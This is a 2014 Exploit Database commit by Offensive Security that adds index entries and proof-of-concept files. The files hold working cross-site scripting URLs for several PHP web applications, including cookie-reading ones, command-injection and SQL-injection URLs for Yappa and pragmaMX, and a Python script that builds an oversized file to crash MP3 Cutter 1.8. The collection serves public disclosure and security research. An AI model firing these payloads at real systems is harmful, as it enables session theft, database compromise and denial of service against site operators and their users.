Updated 08_09_2014

This commit is contained in:
Offensive Security 2014-08-09 04:41:33 +00:00
parent 8687f3ea70
commit 7cbd3c3dff
10 changed files with 141 additions and 0 deletions

View file

@ -30871,3 +30871,12 @@ id,file,description,date,author,platform,type,port
34270,platforms/multiple/dos/34270.txt,"Ubisoft Ghost Recon Advanced Warfighter Integer Overflow and Array Indexing Overflow Vulnerabilities",2010-07-07,"Luigi Auriemma",multiple,dos,0
34271,platforms/multiple/remote/34271.txt,"id Software id Tech 4 Engine 'key' Packet Remote Code Execution Vulnerability",2010-07-05,"Luigi Auriemma",multiple,remote,0
34272,platforms/windows/local/34272.py,"Symantec Endpoint Protection 11.x, 12.x - Kernel Pool Overflow",2014-08-05,"ryujin & sickness",windows,local,0
34280,platforms/php/webapps/34280.txt,"PHPFABER CMS 2.0.5 Multiple Cross-Site Scripting Vulnerabilities",2010-07-04,prodigy,php,webapps,0
34281,platforms/windows/dos/34281.py,"MP3 Cutter 1.8 MP3 File Processing Remote Denial of Service Vulnerability",2010-07-09,"Prashant Uniyal",windows,dos,0
34282,platforms/php/webapps/34282.txt,"Real Estate Manager 1.0.1 'index.php' Cross-Site Scripting Vulnerability",2010-07-09,bi0,php,webapps,0
34283,platforms/php/webapps/34283.txt,"Model Agency Manager 'search_process.php' Cross-Site Scripting Vulnerability",2009-12-13,bi0,php,webapps,0
34284,platforms/php/webapps/34284.txt,"osCSS 1.2.2 'page' Parameter Cross Site Scripting Vulnerability",2010-07-08,"High-Tech Bridge SA",php,webapps,0
34285,platforms/php/webapps/34285.txt,"ArticleMS 2.0 'c[]' Parameter Cross Site Scripting Vulnerability",2010-12-13,Packetdeath,php,webapps,0
34286,platforms/php/webapps/34286.txt,"SimpNews 2.47.3 Multiple Cross Site Scripting Vulnerabilities",2010-07-09,MustLive,php,webapps,0
34287,platforms/php/webapps/34287.txt,"Yappa 3.1.2 'yappa.php' Multiple Remote Command Execution Vulnerabilities",2010-07-09,"Sn!pEr.S!Te Hacker",php,webapps,0
34288,platforms/php/webapps/34288.txt,"pragmaMX 0.1.11 'modules.php' Multiple SQL Injection Vulnerabilities",2009-12-22,"Hadi Kiamarsi",php,webapps,0

Can't render this file because it is too large.

15
platforms/php/webapps/34280.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/41498/info
PHPFABER CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
PHPFABER CMS 2.0.5 is vulnerable; prior versions may also be affected.
The following example URIs are available:
http://www.example.com/cms/module.php?mod=Search&query=%3Cscript%3Ealert%280%29%3C/script%3E&stype=OR&go=++++Go!++++
http://www.example.com/cms/module.php/Products/%22%3E%3Cscript%3Ealert%280%29%3C/script%3E
http://www.example.com/cms/cms_admin/index.php?mod=%3Cscript%3Ealert%280%29%3C/script%3E&action=setup

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/41507/info
Real Estate Manager is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Real Estate Manager 1.0.1 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?lang=[XSS]

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/41509/info
Model Agency Manager is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/search_process.php?searchtype="/><script>alert('XSS')</script>

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/41510/info
osCSS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
osCSS version 1.2.2 is vulnerable; other versions may also be affected.
http://www.example.com/admin/currencies.php?page=1"><script>alert(document.cookie)</script>&cID=1

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/41511/info
ArticleMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
ArticleMS 2.0 is vulnerable; other versions may also be affected.
http://www.example.com/search/?a=search&q=PACKETDEATH&advanced=1&sortby=0&finddate=0&c[]=[XSS]

11
platforms/php/webapps/34286.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/41517/info
SimpNews is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
SimpNews 2.47.03 is vulnerable; other versions may also be affected.
http://www.example.com/simpnews/news.php?layout=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/simpnews/news.php?lang=en&layout=layout2&sortorder=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

10
platforms/php/webapps/34287.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/41521/info
Yappa (Yet Another PHP Photo Album) is prone to multiple remote command-execution vulnerabilities because it fails to properly validate user-supplied input.
An attacker can exploit these issues to execute arbitrary commands within the context of the vulnerable system.
Yappa 3.1.2 is vulnerable; other versions may also be affected.
http://www.example.com/yappa/yappa.php?thedir=[ command you ]
http://www.example.com/yappa/yappa.php?image=[ command you]

13
platforms/php/webapps/34288.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/41523/info
pragmaMX is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
pragmaMX 0.1.11 is vulnerable; other versions may also be affected.
http://www.example.com/modules.php?name=Your_Account&rop=showcontent"+and+31337-31337=0+--+&id=111-222-1933email@address.tst
http://www.example.com/modules.php?name=Your_Account&min=0&orderby=dateD"+and+31337-31337=0+--+&cid=0&jumpswitch=Switch
http://www.example.com/modules.php?name=Your_Account&op=pass_lost&query=111-222-1933email@address.tst&min=0'+and+31337-31337='0&orderby=dateD
http://www.example.com/modules.php?name=Your_Account&rop=showcontent&id=111-222-1933email@address.tst"+and+31337-31337="0

49
platforms/windows/dos/34281.py Executable file
View file

@ -0,0 +1,49 @@
source: http://www.securityfocus.com/bid/41506/info
MP3 Cutter is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to cause an affected application to crash, denying service to legitimate users.
MP3 Cutter 1.8 is vulnerable; other versions may also be affected.
##########################################################
## Legion of Xtremers & Hackers Garage
## (www.loxian.co.cc) (www.garage4hackers.com)
## MP3 Cutter 1.8 Crash Exploit
## http://www.aivsoft.com/downloads/mp3cutter/download.html
## Author: Prashant a.k.a t3rm!n4t0r
## c0ntact: happyterminator@gmail.com
##
## Greetz to: vinnu, b0nd, fb1h2s, Anarki, Nikhil, D4RK3ST
#########################################################
#exploit.py
#MP3 cutter Crash Exploit
print " MP3 Cutter Crash Exploit ( mp3 file ) \n"
header1 = (
"\x3C\x41\x53\x58\x20\x56\x45\x52\x53\x49\x4F\x4E\x3D\x22\x33"
"\x2E\x30\x22\x3E\x0A\x0A\x3C\x45\x4E\x54\x52\x59\x3E\x3C\x54"
"\x49\x54\x4C\x45\x3E\x65\x78\x70\x6C\x6F\x69\x74\x3C\x2F\x54"
"\x49\x54\x4C\x45\x3E\x0A\x3C\x52\x45\x46\x20\x48\x52\x45\x46"
"\x3D\x22"
)
header2 = (
"\x2E\x61\x73\x66\x22\x2F\x3E\x0A\x3C\x2F\x45\x4E\x54\x52\x59"
"\x3E\x3C\x2F\x41\x53\x58\x3E"
)
crash = "\x41" * 10000
exploit = header1 + crash + header2
try:
out_file = open("crash.mp3",'w')
out_file.write(exploit)
out_file.close()
raw_input("\nExploit file created!\n")
except:
print "Error"